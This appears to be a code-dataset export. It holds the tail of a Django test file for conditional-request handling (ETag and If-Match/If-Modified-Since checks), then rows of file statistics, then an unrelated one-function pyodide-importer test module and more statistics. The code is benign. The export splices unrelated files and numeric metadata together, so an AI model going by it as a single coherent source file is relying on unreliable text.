self.client.defaults['HTTP_IF_MATCH'] = ETAG
response = self.client.get('/condition/weak_etag/')
self.assertEqual(response.status_code, 412)
self.client.defaults['HTTP_IF_MATCH'] = WEAK_ETAG
response = self.client.get('/condition/weak_etag/')
self.assertEqual(response.status_code, 412)
response = self.client.get('/condition/')
self.assertEqual(response.status_code, 412)
def test_all_if_match(self):
self.client.defaults['HTTP_IF_MATCH'] = '*'
response = self.client.get('/condition/')
self.assertFullResponse(response)
response = self.client.get('/condition/no_etag/')
self.assertEqual(response.status_code, 412)
def test_both_headers(self):
# see https://tools.ietf.org/html/rfc7232#section-6
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_NONE_MATCH'] = ETAG
response = self.client.get('/condition/')
self.assertNotModified(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_NONE_MATCH'] = ETAG
response = self.client.get('/condition/')
self.assertNotModified(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_NONE_MATCH'] = EXPIRED_ETAG
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_NONE_MATCH'] = EXPIRED_ETAG
response = self.client.get('/condition/')
self.assertFullResponse(response)
def test_both_headers_2(self):
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_MATCH'] = ETAG
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_MATCH'] = ETAG
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_MATCH'] = EXPIRED_ETAG
response = self.client.get('/condition/')
self.assertEqual(response.status_code, 412)
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_MATCH'] = EXPIRED_ETAG
response = self.client.get('/condition/')
self.assertEqual(response.status_code, 412)
def test_single_condition_1(self):
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
response = self.client.get('/condition/last_modified/')
self.assertNotModified(response)
response = self.client.get('/condition/etag/')
self.assertFullResponse(response, check_last_modified=False)
def test_single_condition_2(self):
self.client.defaults['HTTP_IF_NONE_MATCH'] = ETAG
response = self.client.get('/condition/etag/')
self.assertNotModified(response)
response = self.client.get('/condition/last_modified/')
self.assertFullResponse(response, check_etag=False)
def test_single_condition_3(self):
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
response = self.client.get('/condition/last_modified/')
self.assertFullResponse(response, check_etag=False)
def test_single_condition_4(self):
self.client.defaults['HTTP_IF_NONE_MATCH'] = EXPIRED_ETAG
response = self.client.get('/condition/etag/')
self.assertFullResponse(response, check_last_modified=False)
def test_single_condition_5(self):
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
response = self.client.get('/condition/last_modified2/')
self.assertNotModified(response)
response = self.client.get('/condition/etag2/')
self.assertFullResponse(response, check_last_modified=False)
def test_single_condition_6(self):
self.client.defaults['HTTP_IF_NONE_MATCH'] = ETAG
response = self.client.get('/condition/etag2/')
self.assertNotModified(response)
response = self.client.get('/condition/last_modified2/')
self.assertFullResponse(response, check_etag=False)
def test_single_condition_7(self):
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
response = self.client.get('/condition/last_modified/')
self.assertEqual(response.status_code, 412)
response = self.client.get('/condition/etag/')
self.assertEqual(response.status_code, 412)
def test_single_condition_8(self):
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_STR
response = self.client.get('/condition/last_modified/')
self.assertFullResponse(response, check_etag=False)
def test_single_condition_9(self):
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
response = self.client.get('/condition/last_modified2/')
self.assertEqual(response.status_code, 412)
response = self.client.get('/condition/etag2/')
self.assertEqual(response.status_code, 412)
def test_single_condition_head(self):
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
response = self.client.head('/condition/')
self.assertNotModified(response)
def test_unquoted(self):
"""
The same quoted ETag should be set on the header regardless of whether
etag_func() in condition() returns a quoted or an unquoted ETag.
"""
response_quoted = self.client.get('/condition/etag/')
response_unquoted = self.client.get('/condition/unquoted_etag/')
self.assertEqual(response_quoted['ETag'], response_unquoted['ETag'])
# It's possible that the matching algorithm could use the wrong value even
# if the ETag header is set correctly correctly (as tested by
# test_unquoted()), so check that the unquoted value is matched.
def test_unquoted_if_none_match(self):
self.client.defaults['HTTP_IF_NONE_MATCH'] = ETAG
response = self.client.get('/condition/unquoted_etag/')
self.assertNotModified(response)
response = self.client.put('/condition/unquoted_etag/')
self.assertEqual(response.status_code, 412)
self.client.defaults['HTTP_IF_NONE_MATCH'] = EXPIRED_ETAG
response = self.client.get('/condition/unquoted_etag/')
self.assertFullResponse(response, check_last_modified=False)
def test_invalid_etag(self):
self.client.defaults['HTTP_IF_NONE_MATCH'] = '"""'
response = self.client.get('/condition/etag/')
self.assertFullResponse(response, check_last_modified=False)
| 46.516245
| 86
| 0.697711
| 1,515
| 12,885
| 5.692409
| 0.10231
| 0.126391
| 0.152365
| 0.127551
| 0.814819
| 0.797658
| 0.780148
| 0.767857
| 0.737941
| 0.699212
| 0
| 0.020291
| 0.189135
| 12,885
| 276
| 87
| 46.684783
| 0.80513
| 0.052852
| 0
| 0.695455
| 0
| 0
| 0.185806
| 0.089888
| 0
| 0
| 0
| 0
| 0.318182
| 1
| 0.118182
| false
| 0
| 0.009091
| 0
| 0.131818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
91478cc403b124238969e88d6c6e4de34c755925
| 104
|
py
|
Python
|
test_modules/regular_module/__init__.py
|
ryanking13/pyodide-importer
|
fb9f83e54eb307fcdb2590588f0b75db1c87ca97
|
[
"MIT"
] | 1
|
2021-11-16T11:55:54.000Z
|
2021-11-16T11:55:54.000Z
|
test_modules/regular_module/__init__.py
|
ryanking13/pyodide-importer
|
fb9f83e54eb307fcdb2590588f0b75db1c87ca97
|
[
"MIT"
] | null | null | null |
test_modules/regular_module/__init__.py
|
ryanking13/pyodide-importer
|
fb9f83e54eb307fcdb2590588f0b75db1c87ca97
|
[
"MIT"
] | null | null | null |
from .submodule2 import hello as submodule2_hello
def hello():
return "hello from regular_module"
| 17.333333
| 49
| 0.769231
| 14
| 104
| 5.571429
| 0.642857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023256
| 0.173077
| 104
| 5
| 50
| 20.8
| 0.883721
| 0
| 0
| 0
| 0
| 0
| 0.240385
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.